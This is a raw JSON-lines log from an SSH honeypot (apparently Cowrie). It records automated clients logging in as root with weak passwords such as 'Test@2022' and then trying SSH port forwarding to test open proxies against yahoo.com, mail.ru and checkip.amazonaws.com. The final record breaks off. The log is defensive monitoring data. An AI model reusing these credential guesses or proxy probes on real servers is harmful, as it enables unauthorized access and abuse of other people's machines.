{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":16861,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:16861","sensor":"my-vps","timestamp":"2025-08-31T03:52:33.419012Z","session":"39aa6a83b619"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:33.471526Z","src_ip":"77.83.207.83","session":"39aa6a83b619"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":906,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:906","sensor":"my-vps","timestamp":"2025-08-31T03:52:33.618907Z","session":"39aa6a83b619"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:33.671506Z","src_ip":"77.83.207.83","session":"39aa6a83b619"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:33.725313Z","src_ip":"77.83.207.83","session":"39aa6a83b619"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":34654,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e0e359dd98a","protocol":"ssh","message":"New connection: 77.83.207.83:34654 (1.2.3.4:22) [session: 6e0e359dd98a]","sensor":"my-vps","timestamp":"2025-08-31T03:52:33.774953Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:33.775583Z","src_ip":"77.83.207.83","session":"6e0e359dd98a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:33.826206Z","src_ip":"77.83.207.83","session":"6e0e359dd98a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:34.076508Z","src_ip":"77.83.207.83","session":"6e0e359dd98a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":4246,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:4246","sensor":"my-vps","timestamp":"2025-08-31T03:52:34.127619Z","session":"6e0e359dd98a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:34.178063Z","src_ip":"77.83.207.83","session":"6e0e359dd98a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":16477,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:16477","sensor":"my-vps","timestamp":"2025-08-31T03:52:34.320608Z","session":"6e0e359dd98a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:34.370953Z","src_ip":"77.83.207.83","session":"6e0e359dd98a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":27658,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:27658","sensor":"my-vps","timestamp":"2025-08-31T03:52:34.512696Z","session":"6e0e359dd98a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:34.562927Z","src_ip":"77.83.207.83","session":"6e0e359dd98a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41516,"dst_ip":"1.2.3.4","dst_port":22,"session":"36f402c87787","protocol":"ssh","message":"New connection: 212.227.235.229:41516 (1.2.3.4:22) [session: 36f402c87787]","sensor":"my-vps","timestamp":"2025-08-31T03:52:34.603549Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","message":"Remote SSH version: SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","sensor":"my-vps","timestamp":"2025-08-31T03:52:34.604782Z","src_ip":"212.227.235.229","session":"36f402c87787"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:34.614392Z","src_ip":"77.83.207.83","session":"6e0e359dd98a"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":34772,"dst_ip":"1.2.3.4","dst_port":22,"session":"db865a1bd53f","protocol":"ssh","message":"New connection: 77.83.207.83:34772 (1.2.3.4:22) [session: db865a1bd53f]","sensor":"my-vps","timestamp":"2025-08-31T03:52:34.663933Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:34.665144Z","src_ip":"77.83.207.83","session":"db865a1bd53f"}
{"eventid":"cowrie.client.kex","hassh":"390ffe68a68c2a2891210413e80689fa","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com,zlib","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","sk-ecdsa-sha2-nistp256-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","sk-ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","sk-ecdsa-sha2-nistp256@openssh.com","ssh-ed25519","sk-ssh-ed25519@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: 390ffe68a68c2a2891210413e80689fa","sensor":"my-vps","timestamp":"2025-08-31T03:52:34.702769Z","src_ip":"212.227.235.229","session":"36f402c87787"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:34.715290Z","src_ip":"77.83.207.83","session":"db865a1bd53f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:34.965417Z","src_ip":"77.83.207.83","session":"db865a1bd53f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":21687,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:21687","sensor":"my-vps","timestamp":"2025-08-31T03:52:35.016591Z","session":"db865a1bd53f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:35.066778Z","src_ip":"77.83.207.83","session":"db865a1bd53f"}
{"eventid":"cowrie.login.success","username":"root","password":"Q1w2e3r4","message":"login attempt [root/Q1w2e3r4] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:35.195175Z","src_ip":"212.227.235.229","session":"36f402c87787"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":30586,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:30586","sensor":"my-vps","timestamp":"2025-08-31T03:52:35.208474Z","session":"db865a1bd53f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:35.258758Z","src_ip":"77.83.207.83","session":"db865a1bd53f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":9965,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:9965","sensor":"my-vps","timestamp":"2025-08-31T03:52:35.400589Z","session":"db865a1bd53f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:35.451191Z","src_ip":"77.83.207.83","session":"db865a1bd53f"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:35.502605Z","src_ip":"77.83.207.83","session":"db865a1bd53f"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":34860,"dst_ip":"1.2.3.4","dst_port":22,"session":"600b516551dd","protocol":"ssh","message":"New connection: 77.83.207.83:34860 (1.2.3.4:22) [session: 600b516551dd]","sensor":"my-vps","timestamp":"2025-08-31T03:52:35.551904Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:35.552693Z","src_ip":"77.83.207.83","session":"600b516551dd"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:35.603032Z","src_ip":"77.83.207.83","session":"600b516551dd"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:35.855349Z","src_ip":"77.83.207.83","session":"600b516551dd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":15867,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:15867","sensor":"my-vps","timestamp":"2025-08-31T03:52:35.906618Z","session":"600b516551dd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:35.957692Z","src_ip":"77.83.207.83","session":"600b516551dd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"34.251.75.6","dst_port":443,"src_ip":"212.227.235.229","src_port":51906,"message":"direct-tcp connection request to 34.251.75.6:443 from 127.0.0.1:51906","sensor":"my-vps","timestamp":"2025-08-31T03:52:36.038199Z","session":"36f402c87787"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":7661,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:7661","sensor":"my-vps","timestamp":"2025-08-31T03:52:36.100923Z","session":"600b516551dd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:36.151452Z","src_ip":"77.83.207.83","session":"600b516551dd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"34.251.75.6","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x19X&\\xfc\\xb5v9\\xc1c\\xf2\\x11\\x04\\x8e\\xa0\\xf9\\xc7\\xe8P\\xe0\\x15\\xaeN\\xdf\\x9c\\xe5Y}bC\\xddAR \\xe4\\x89>\\xee}\\xc1\\x0c_\\x98\\xf4l\\xb6\\xd3\\xd4\\xe0\\x08\\x93#\\xe4\\xac\\xa7\\xcc\\x04k\\xafpv\\xc4\\r\\xbb\\x08O\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xc2J\\x9e\\xf3\\\\^V_\\xc7\\xf3\\xb0.\\x19\\x87s\\xd7\\xd8\\xc4\\x93\\xad^\\xc4\\xb5|_@\\x15\\x83\\xb9\\xdfoJ\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":0,"message":"discarded direct-tcp forward request 0 to 34.251.75.6:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x19X&\\xfc\\xb5v9\\xc1c\\xf2\\x11\\x04\\x8e\\xa0\\xf9\\xc7\\xe8P\\xe0\\x15\\xaeN\\xdf\\x9c\\xe5Y}bC\\xddAR \\xe4\\x89>\\xee}\\xc1\\x0c_\\x98\\xf4l\\xb6\\xd3\\xd4\\xe0\\x08\\x93#\\xe4\\xac\\xa7\\xcc\\x04k\\xafpv\\xc4\\r\\xbb\\x08O\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 